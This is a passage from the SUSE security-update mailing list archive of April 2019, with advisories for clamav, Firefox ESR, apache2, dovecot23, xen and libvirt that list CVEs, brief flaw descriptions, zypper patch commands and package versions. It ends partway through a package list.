https://bugzilla.suse.com/1119081 https://bugzilla.suse.com/1119964 https://bugzilla.suse.com/1121038 https://bugzilla.suse.com/1121195 https://bugzilla.suse.com/1121856 https://bugzilla.suse.com/1122836 https://bugzilla.suse.com/1123991 https://bugzilla.suse.com/1124639 https://bugzilla.suse.com/1126862 https://bugzilla.suse.com/1128781 https://bugzilla.suse.com/1129765 https://bugzilla.suse.com/1130658 From sle-security-updates at lists.suse.com Wed Apr 3 16:19:36 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 4 Apr 2019 00:19:36 +0200 (CEST) Subject: SUSE-SU-2019:0861-1: important: Security update for clamav Message-ID: <20190403221936.027C7FF2D@maintenance.suse.de> SUSE Security Update: Security update for clamav ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0861-1 Rating: important References: #1130721 Cross-References: CVE-2019-1787 CVE-2019-1788 CVE-2019-1789 Affected Products: SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for clamav to version 0.100.3 fixes the following issues: Security issues fixed (bsc#1130721): - CVE-2019-1787: Fixed an out-of-bounds heap read condition which may occur when scanning PDF documents. - CVE-2019-1789: Fixed an out-of-bounds heap read condition which may occur when scanning PE files (i.e. Windows EXE and DLL files). - CVE-2019-1788: Fixed an out-of-bounds heap write condition which may occur when scanning OLE2 files such as Microsoft Office 97-2003 documents. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-861=1 Package List: - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): clamav-0.100.3-3.9.1 clamav-debuginfo-0.100.3-3.9.1 clamav-debugsource-0.100.3-3.9.1 clamav-devel-0.100.3-3.9.1 libclamav7-0.100.3-3.9.1 libclamav7-debuginfo-0.100.3-3.9.1 libclammspack0-0.100.3-3.9.1 libclammspack0-debuginfo-0.100.3-3.9.1 References: https://www.suse.com/security/cve/CVE-2019-1787.html https://www.suse.com/security/cve/CVE-2019-1788.html https://www.suse.com/security/cve/CVE-2019-1789.html https://bugzilla.suse.com/1130721 From sle-security-updates at lists.suse.com Thu Apr 4 10:11:00 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 4 Apr 2019 18:11:00 +0200 (CEST) Subject: SUSE-SU-2019:0871-1: important: Security update for MozillaFirefox Message-ID: <20190404161100.59F9C10125@maintenance.suse.de> SUSE Security Update: Security update for MozillaFirefox ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0871-1 Rating: important References: #1125330 #1127987 #1129821 #1130262 Cross-References: CVE-2018-18335 CVE-2018-18356 CVE-2018-18506 CVE-2019-5785 CVE-2019-9788 CVE-2019-9790 CVE-2019-9791 CVE-2019-9792 CVE-2019-9793 CVE-2019-9794 CVE-2019-9795 CVE-2019-9796 CVE-2019-9801 CVE-2019-9810 CVE-2019-9813 Affected Products: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Desktop Applications 15 ______________________________________________________________________________ An update that fixes 15 vulnerabilities is now available. Description: This update for MozillaFirefox to version ESR 60.6.1 fixes the following issues: Security issuess addressed: - update to Firefox ESR 60.6.1 (bsc#1130262): - CVE-2019-9813: Fixed Ionmonkey type confusion with __proto__ mutations - CVE-2019-9810: Fixed IonMonkey MArraySlice incorrect alias information - Update to Firefox ESR 60.6 (bsc#1129821): - CVE-2018-18506: Fixed an issue with Proxy Auto-Configuration file - CVE-2019-9801: Fixed an issue which could allow Windows programs to be exposed to web content - CVE-2019-9788: Fixed multiple memory safety bugs - CVE-2019-9790: Fixed a Use-after-free vulnerability when removing in-use DOM elements - CVE-2019-9791: Fixed an incorrect Type inference for constructors entered through on-stack replacement with IonMonkey - CVE-2019-9792: Fixed an issue where IonMonkey leaks JS_OPTIMIZED_OUT magic value to script - CVE-2019-9793: Fixed multiple improper bounds checks when Spectre mitigations are disabled - CVE-2019-9794: Fixed an issue where command line arguments not discarded during execution - CVE-2019-9795: Fixed a Type-confusion vulnerability in IonMonkey JIT compiler - CVE-2019-9796: Fixed a Use-after-free vulnerability in SMIL animation controller - Update to Firefox ESR 60.5.1 (bsc#1125330): - CVE-2018-18356: Fixed a use-after-free vulnerability in the Skia library which can occur when creating a path, leading to a potentially exploitable crash. - CVE-2019-5785: Fixed an integer overflow vulnerability in the Skia library which can occur after specific transform operations, leading to a potentially exploitable crash. - CVE-2018-18335: Fixed a buffer overflow vulnerability in the Skia library which can occur with Canvas 2D acceleration on macOS. This issue was addressed by disabling Canvas 2D acceleration in Firefox ESR. Note: this does not affect other versions and platforms where Canvas 2D acceleration is already disabled by default. Other issue addressed: - Fixed an issue with MozillaFirefox-translations-common which was causing error on update (bsc#1127987). Release notes: https://www.mozilla.org/en-US/security/advisories/mfsa2019-12/ Release notes: https://www.mozilla.org/en-US/security/advisories/mfsa2019-08/ Release notes: https://www.mozilla.org/en-US/security/advisories/mfsa2019-05/ Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-871=1 - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-871=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): MozillaFirefox-branding-upstream-60.6.1-3.29.3 MozillaFirefox-debuginfo-60.6.1-3.29.3 MozillaFirefox-debugsource-60.6.1-3.29.3 - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64): MozillaFirefox-60.6.1-3.29.3 MozillaFirefox-debuginfo-60.6.1-3.29.3 MozillaFirefox-debugsource-60.6.1-3.29.3 MozillaFirefox-devel-60.6.1-3.29.3 MozillaFirefox-translations-common-60.6.1-3.29.3 MozillaFirefox-translations-other-60.6.1-3.29.3 References: https://www.suse.com/security/cve/CVE-2018-18335.html https://www.suse.com/security/cve/CVE-2018-18356.html https://www.suse.com/security/cve/CVE-2018-18506.html https://www.suse.com/security/cve/CVE-2019-5785.html https://www.suse.com/security/cve/CVE-2019-9788.html https://www.suse.com/security/cve/CVE-2019-9790.html https://www.suse.com/security/cve/CVE-2019-9791.html https://www.suse.com/security/cve/CVE-2019-9792.html https://www.suse.com/security/cve/CVE-2019-9793.html https://www.suse.com/security/cve/CVE-2019-9794.html https://www.suse.com/security/cve/CVE-2019-9795.html https://www.suse.com/security/cve/CVE-2019-9796.html https://www.suse.com/security/cve/CVE-2019-9801.html https://www.suse.com/security/cve/CVE-2019-9810.html https://www.suse.com/security/cve/CVE-2019-9813.html https://bugzilla.suse.com/1125330 https://bugzilla.suse.com/1127987 https://bugzilla.suse.com/1129821 https://bugzilla.suse.com/1130262 From sle-security-updates at lists.suse.com Thu Apr 4 16:10:03 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 5 Apr 2019 00:10:03 +0200 (CEST) Subject: SUSE-SU-2019:0873-1: important: Security update for apache2 Message-ID: <20190404221003.422B3FF2D@maintenance.suse.de> SUSE Security Update: Security update for apache2 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0873-1 Rating: important References: #1131233 #1131237 #1131239 #1131241 #1131245 Cross-References: CVE-2019-0196 CVE-2019-0197 CVE-2019-0211 CVE-2019-0217 CVE-2019-0220 Affected Products: SUSE Linux Enterprise Module for Server Applications 15 SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 ______________________________________________________________________________ An update that fixes 5 vulnerabilities is now available. Description: This update for apache2 fixes the following issues: * CVE-2019-0211: A flaw in the Apache HTTP Server allowed less-privileged child processes or threads to execute arbitrary code with the privileges of the parent process. Attackers with control over CGI scripts or extension modules run by the server could have abused this issue to potentially gain super user privileges. [bsc#1131233] * CVE-2019-0220: The Apache HTTP server did not use a consistent strategy for URL normalization throughout all of its components. In particular, consecutive slashes were not always collapsed. Attackers could potentially abuse these inconsistencies to by-pass access control mechanisms and thus gain unauthorized access to protected parts of the service. [bsc#1131241] * CVE-2019-0217: A race condition in Apache's "mod_auth_digest" when running in a threaded server could have allowed users with valid credentials to authenticate using another username, bypassing configured access control restrictions. [bsc#1131239] * CVE-2019-0197: When HTTP/2 support was enabled in the Apache server for a 'http' host or H2Upgrade was enabled for h2 on a 'https' host, an Upgrade request from http/1.1 to http/2 that was not the first request on a connection could lead to a misconfiguration and crash. This issue could have been abused to mount a denial-of-service attack. Servers that never enabled the h2 protocol or that only enabled it for https: and did not configure the "H2Upgrade on" are unaffected. [bsc#1131245] * CVE-2019-0196: Through specially crafted network input the Apache's http/2 request handler could be lead to access previously freed memory while determining the method of a request. This resulted in the request being misclassified and thus being processed incorrectly. [bsc#1131237] Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Server Applications 15: zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-873=1 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-873=1 Package List: - SUSE Linux Enterprise Module for Server Applications 15 (aarch64 ppc64le s390x x86_64): apache2-2.4.33-3.15.1 apache2-debuginfo-2.4.33-3.15.1 apache2-debugsource-2.4.33-3.15.1 apache2-devel-2.4.33-3.15.1 apache2-prefork-2.4.33-3.15.1 apache2-prefork-debuginfo-2.4.33-3.15.1 apache2-utils-2.4.33-3.15.1 apache2-utils-debuginfo-2.4.33-3.15.1 apache2-worker-2.4.33-3.15.1 apache2-worker-debuginfo-2.4.33-3.15.1 - SUSE Linux Enterprise Module for Server Applications 15 (noarch): apache2-doc-2.4.33-3.15.1 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): apache2-debuginfo-2.4.33-3.15.1 apache2-debugsource-2.4.33-3.15.1 apache2-event-2.4.33-3.15.1 apache2-event-debuginfo-2.4.33-3.15.1 apache2-example-pages-2.4.33-3.15.1 References: https://www.suse.com/security/cve/CVE-2019-0196.html https://www.suse.com/security/cve/CVE-2019-0197.html https://www.suse.com/security/cve/CVE-2019-0211.html https://www.suse.com/security/cve/CVE-2019-0217.html https://www.suse.com/security/cve/CVE-2019-0220.html https://bugzilla.suse.com/1131233 https://bugzilla.suse.com/1131237 https://bugzilla.suse.com/1131239 https://bugzilla.suse.com/1131241 https://bugzilla.suse.com/1131245 From sle-security-updates at lists.suse.com Thu Apr 4 16:15:52 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 5 Apr 2019 00:15:52 +0200 (CEST) Subject: SUSE-SU-2019:0878-1: important: Security update for apache2 Message-ID: <20190404221552.D97B4FF2D@maintenance.suse.de> SUSE Security Update: Security update for apache2 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0878-1 Rating: important References: #1131233 #1131237 #1131239 #1131241 #1131245 Cross-References: CVE-2019-0196 CVE-2019-0197 CVE-2019-0211 CVE-2019-0217 CVE-2019-0220 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Enterprise Storage 4 ______________________________________________________________________________ An update that fixes 5 vulnerabilities is now available. Description: This update for apache2 fixes the following issues: * CVE-2019-0220: The Apache HTTP server did not use a consistent strategy for URL normalization throughout all of its components. In particular, consecutive slashes were not always collapsed. Attackers could potentially abuse these inconsistencies to by-pass access control mechanisms and thus gain unauthorized access to protected parts of the service. [bsc#1131241] * CVE-2019-0217: A race condition in Apache's "mod_auth_digest" when running in a threaded server could have allowed users with valid credentials to authenticate using another username, bypassing configured access control restrictions. [bsc#1131239] * CVE-2019-0211: A flaw in the Apache HTTP Server allowed less-privileged child processes or threads to execute arbitrary code with the privileges of the parent process. Attackers with control over CGI scripts or extension modules run by the server could have abused this issue to potentially gain super user privileges. [bsc#1131233] * CVE-2019-0197: When HTTP/2 support was enabled in the Apache server for a 'http' host or H2Upgrade was enabled for h2 on a 'https' host, an Upgrade request from http/1.1 to http/2 that was not the first request on a connection could lead to a misconfiguration and crash. This issue could have been abused to mount a denial-of-service attack. Servers that never enabled the h2 protocol or that only enabled it for https: and did not configure the "H2Upgrade on" are unaffected. [bsc#1131245] * CVE-2019-0196: Through specially crafted network input the Apache's http/2 request handler could be lead to access previously freed memory while determining the method of a request. This resulted in the request being misclassified and thus being processed incorrectly. [bsc#1131237] Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-878=1 - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-878=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-878=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-878=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-878=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-878=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-878=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-878=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-878=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): apache2-2.4.23-29.40.1 apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-example-pages-2.4.23-29.40.1 apache2-prefork-2.4.23-29.40.1 apache2-prefork-debuginfo-2.4.23-29.40.1 apache2-utils-2.4.23-29.40.1 apache2-utils-debuginfo-2.4.23-29.40.1 apache2-worker-2.4.23-29.40.1 apache2-worker-debuginfo-2.4.23-29.40.1 - SUSE OpenStack Cloud 7 (noarch): apache2-doc-2.4.23-29.40.1 - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-devel-2.4.23-29.40.1 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-devel-2.4.23-29.40.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): apache2-2.4.23-29.40.1 apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-example-pages-2.4.23-29.40.1 apache2-prefork-2.4.23-29.40.1 apache2-prefork-debuginfo-2.4.23-29.40.1 apache2-utils-2.4.23-29.40.1 apache2-utils-debuginfo-2.4.23-29.40.1 apache2-worker-2.4.23-29.40.1 apache2-worker-debuginfo-2.4.23-29.40.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (noarch): apache2-doc-2.4.23-29.40.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): apache2-2.4.23-29.40.1 apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-example-pages-2.4.23-29.40.1 apache2-prefork-2.4.23-29.40.1 apache2-prefork-debuginfo-2.4.23-29.40.1 apache2-utils-2.4.23-29.40.1 apache2-utils-debuginfo-2.4.23-29.40.1 apache2-worker-2.4.23-29.40.1 apache2-worker-debuginfo-2.4.23-29.40.1 - SUSE Linux Enterprise Server 12-SP4 (noarch): apache2-doc-2.4.23-29.40.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): apache2-2.4.23-29.40.1 apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-example-pages-2.4.23-29.40.1 apache2-prefork-2.4.23-29.40.1 apache2-prefork-debuginfo-2.4.23-29.40.1 apache2-utils-2.4.23-29.40.1 apache2-utils-debuginfo-2.4.23-29.40.1 apache2-worker-2.4.23-29.40.1 apache2-worker-debuginfo-2.4.23-29.40.1 - SUSE Linux Enterprise Server 12-SP3 (noarch): apache2-doc-2.4.23-29.40.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): apache2-2.4.23-29.40.1 apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-example-pages-2.4.23-29.40.1 apache2-prefork-2.4.23-29.40.1 apache2-prefork-debuginfo-2.4.23-29.40.1 apache2-utils-2.4.23-29.40.1 apache2-utils-debuginfo-2.4.23-29.40.1 apache2-worker-2.4.23-29.40.1 apache2-worker-debuginfo-2.4.23-29.40.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (noarch): apache2-doc-2.4.23-29.40.1 - SUSE Linux Enterprise Server 12-SP2-BCL (noarch): apache2-doc-2.4.23-29.40.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): apache2-2.4.23-29.40.1 apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-example-pages-2.4.23-29.40.1 apache2-prefork-2.4.23-29.40.1 apache2-prefork-debuginfo-2.4.23-29.40.1 apache2-utils-2.4.23-29.40.1 apache2-utils-debuginfo-2.4.23-29.40.1 apache2-worker-2.4.23-29.40.1 apache2-worker-debuginfo-2.4.23-29.40.1 - SUSE Enterprise Storage 4 (noarch): apache2-doc-2.4.23-29.40.1 - SUSE Enterprise Storage 4 (x86_64): apache2-2.4.23-29.40.1 apache2-debuginfo-2.4.23-29.40.1 apache2-debugsource-2.4.23-29.40.1 apache2-example-pages-2.4.23-29.40.1 apache2-prefork-2.4.23-29.40.1 apache2-prefork-debuginfo-2.4.23-29.40.1 apache2-utils-2.4.23-29.40.1 apache2-utils-debuginfo-2.4.23-29.40.1 apache2-worker-2.4.23-29.40.1 apache2-worker-debuginfo-2.4.23-29.40.1 References: https://www.suse.com/security/cve/CVE-2019-0196.html https://www.suse.com/security/cve/CVE-2019-0197.html https://www.suse.com/security/cve/CVE-2019-0211.html https://www.suse.com/security/cve/CVE-2019-0217.html https://www.suse.com/security/cve/CVE-2019-0220.html https://bugzilla.suse.com/1131233 https://bugzilla.suse.com/1131237 https://bugzilla.suse.com/1131239 https://bugzilla.suse.com/1131241 https://bugzilla.suse.com/1131245 From sle-security-updates at lists.suse.com Thu Apr 4 16:20:47 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 5 Apr 2019 00:20:47 +0200 (CEST) Subject: SUSE-SU-2019:0876-1: moderate: Security update for dovecot23 Message-ID: <20190404222047.E57D2FF2D@maintenance.suse.de> SUSE Security Update: Security update for dovecot23 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0876-1 Rating: moderate References: #1130116 Cross-References: CVE-2019-7524 Affected Products: SUSE Linux Enterprise Module for Server Applications 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for dovecot23 fixes the following issue: Security issue fixed: - CVE-2019-7524: Fixed an improper file handling which could result in stack oveflow allowing local root escalation (bsc#1130116). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Server Applications 15: zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-876=1 Package List: - SUSE Linux Enterprise Module for Server Applications 15 (aarch64 ppc64le s390x x86_64): dovecot23-2.3.3-4.10.1 dovecot23-backend-mysql-2.3.3-4.10.1 dovecot23-backend-mysql-debuginfo-2.3.3-4.10.1 dovecot23-backend-pgsql-2.3.3-4.10.1 dovecot23-backend-pgsql-debuginfo-2.3.3-4.10.1 dovecot23-backend-sqlite-2.3.3-4.10.1 dovecot23-backend-sqlite-debuginfo-2.3.3-4.10.1 dovecot23-debuginfo-2.3.3-4.10.1 dovecot23-debugsource-2.3.3-4.10.1 dovecot23-devel-2.3.3-4.10.1 dovecot23-fts-2.3.3-4.10.1 dovecot23-fts-debuginfo-2.3.3-4.10.1 dovecot23-fts-lucene-2.3.3-4.10.1 dovecot23-fts-lucene-debuginfo-2.3.3-4.10.1 dovecot23-fts-solr-2.3.3-4.10.1 dovecot23-fts-solr-debuginfo-2.3.3-4.10.1 dovecot23-fts-squat-2.3.3-4.10.1 dovecot23-fts-squat-debuginfo-2.3.3-4.10.1 References: https://www.suse.com/security/cve/CVE-2019-7524.html https://bugzilla.suse.com/1130116 From sle-security-updates at lists.suse.com Thu Apr 4 16:21:30 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 5 Apr 2019 00:21:30 +0200 (CEST) Subject: SUSE-SU-2019:0875-1: important: Recommended update for xen Message-ID: <20190404222130.0186AFF2D@maintenance.suse.de> SUSE Security Update: Recommended update for xen ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0875-1 Rating: important References: #1026236 #1027519 #1114988 #1126140 #1126141 #1126192 #1126195 #1126196 #1126197 #1126198 #1126201 #1126325 #1127400 #1127620 Cross-References: CVE-2018-19967 Affected Products: SUSE Linux Enterprise Module for Server Applications 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that solves one vulnerability and has 13 fixes is now available. Description: This update for xen fixes the following issues: Security issues fixed: - CVE-2018-19967: Fixed HLE constructs that allowed guests to lock up the host, resulting in a Denial of Service (DoS). (XSA-282) (bsc#1114988) - Fixed an issue which could allow malicious PV guests may cause a host crash or gain access to data pertaining to other guests.Additionally, vulnerable configurations are likely to be unstable even in the absence of an attack (bsc#1126198). - Fixed multiple access violations introduced by XENMEM_exchange hypercall which could allow a single PV guest to leak arbitrary amounts of memory, leading to a denial of service (bsc#1126192). - Fixed an issue which could allow a malicious unprivileged guest userspace process to escalate its privilege to that of other userspace processes in the same guest and potentially thereby to that of the guest operating system (bsc#1126201). - Fixed an issue which could allow malicious or buggy x86 PV guest kernels to mount a Denial of Service attack affecting the whole system (bsc#1126197). - Fixed an issue which could allow an untrusted PV domain with access to a physical device to DMA into its own pagetables leading to privilege escalation (bsc#1126195). - Fixed an issue which could allow a malicious or buggy x86 PV guest kernels can mount a Denial of Service attack affecting the whole system (bsc#1126196). - Fixed an issue which could allow malicious 64bit PV guests to cause a host crash (bsc#1127400). - Fixed an issue which could allow malicious or buggy guests with passed through PCI devices to be able to escalate their privileges, crash the host, or access data belonging to other guests. Additionally memory leaks were also possible (bsc#1126140). - Fixed a race condition issue which could allow malicious PV guests to escalate their privilege to that of the hypervisor (bsc#1126141). Other issues fixed: - Upstream bug fixes (bsc#1027519) - Fixed an issue where setup of grant_tables and other variables may fail (bsc#1126325). - Added a requirement for xen, xl.cfg firmware="pvgrub32|pvgrub64 (bsc#1127620). - Added Xen cmdline option "suse_vtsc_tolerance" to avoid TSC emulation for HVM domUs (bsc#1026236). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Server Applications 15: zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-875=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-875=1 Package List: - SUSE Linux Enterprise Module for Server Applications 15 (x86_64): xen-4.10.3_02-3.14.1 xen-debugsource-4.10.3_02-3.14.1 xen-devel-4.10.3_02-3.14.1 xen-tools-4.10.3_02-3.14.1 xen-tools-debuginfo-4.10.3_02-3.14.1 - SUSE Linux Enterprise Module for Basesystem 15 (x86_64): xen-debugsource-4.10.3_02-3.14.1 xen-libs-4.10.3_02-3.14.1 xen-libs-debuginfo-4.10.3_02-3.14.1 xen-tools-domU-4.10.3_02-3.14.1 xen-tools-domU-debuginfo-4.10.3_02-3.14.1 References: https://www.suse.com/security/cve/CVE-2018-19967.html https://bugzilla.suse.com/1026236 https://bugzilla.suse.com/1027519 https://bugzilla.suse.com/1114988 https://bugzilla.suse.com/1126140 https://bugzilla.suse.com/1126141 https://bugzilla.suse.com/1126192 https://bugzilla.suse.com/1126195 https://bugzilla.suse.com/1126196 https://bugzilla.suse.com/1126197 https://bugzilla.suse.com/1126198 https://bugzilla.suse.com/1126201 https://bugzilla.suse.com/1126325 https://bugzilla.suse.com/1127400 https://bugzilla.suse.com/1127620 From sle-security-updates at lists.suse.com Thu Apr 4 16:24:33 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 5 Apr 2019 00:24:33 +0200 (CEST) Subject: SUSE-SU-2019:0553-1: moderate: Security update for libvirt Message-ID: <20190404222433.EF6D4FF2D@maintenance.suse.de> SUSE Security Update: Security update for libvirt ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:0553-1 Rating: moderate References: #1104662 #1120813 #1127458 Cross-References: CVE-2019-3840 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Enterprise Storage 4 ______________________________________________________________________________ An update that solves one vulnerability and has two fixes is now available. Description: This update for libvirt fixes the following issues: Security issues fixed: - CVE-2019-3840: Fixed a null pointer dereference vulnerability in virJSONValueObjectHasKey function which could have resulted in a remote denial of service via the guest agent (bsc#1127458). Other issues fixed: - libxl: save current memory value after successful balloon (bsc#1120813). - spec: Don't restart libvirt-guests when updating libvirt-client (bsc#1104662). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-553=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-553=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-553=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-553=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-553=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): libvirt-2.0.0-27.48.1 libvirt-client-2.0.0-27.48.1 libvirt-client-debuginfo-2.0.0-27.48.1 libvirt-daemon-2.0.0-27.48.1 libvirt-daemon-config-network-2.0.0-27.48.1 libvirt-daemon-config-nwfilter-2.0.0-27.48.1 libvirt-daemon-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-interface-2.0.0-27.48.1 libvirt-daemon-driver-interface-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-lxc-2.0.0-27.48.1 libvirt-daemon-driver-lxc-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-network-2.0.0-27.48.1 libvirt-daemon-driver-network-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-2.0.0-27.48.1 libvirt-daemon-driver-nwfilter-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-qemu-2.0.0-27.48.1 libvirt-daemon-driver-qemu-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-secret-2.0.0-27.48.1 libvirt-daemon-driver-secret-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-storage-2.0.0-27.48.1 libvirt-daemon-driver-storage-debuginfo-2.0.0-27.48.1 libvirt-daemon-hooks-2.0.0-27.48.1 libvirt-daemon-lxc-2.0.0-27.48.1 libvirt-daemon-qemu-2.0.0-27.48.1 libvirt-debugsource-2.0.0-27.48.1 libvirt-doc-2.0.0-27.48.1 libvirt-lock-sanlock-2.0.0-27.48.1 libvirt-lock-sanlock-debuginfo-2.0.0-27.48.1 libvirt-nss-2.0.0-27.48.1 libvirt-nss-debuginfo-2.0.0-27.48.1 - SUSE OpenStack Cloud 7 (x86_64): libvirt-daemon-driver-libxl-2.0.0-27.48.1 libvirt-daemon-driver-libxl-debuginfo-2.0.0-27.48.1 libvirt-daemon-xen-2.0.0-27.48.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): libvirt-2.0.0-27.48.1 libvirt-client-2.0.0-27.48.1 libvirt-client-debuginfo-2.0.0-27.48.1 libvirt-daemon-2.0.0-27.48.1 libvirt-daemon-config-network-2.0.0-27.48.1 libvirt-daemon-config-nwfilter-2.0.0-27.48.1 libvirt-daemon-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-interface-2.0.0-27.48.1 libvirt-daemon-driver-interface-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-lxc-2.0.0-27.48.1 libvirt-daemon-driver-lxc-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-network-2.0.0-27.48.1 libvirt-daemon-driver-network-debuginfo-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-2.0.0-27.48.1 libvirt-daemon-driver-nodedev-debuginfo-2.0.0-27.48.1 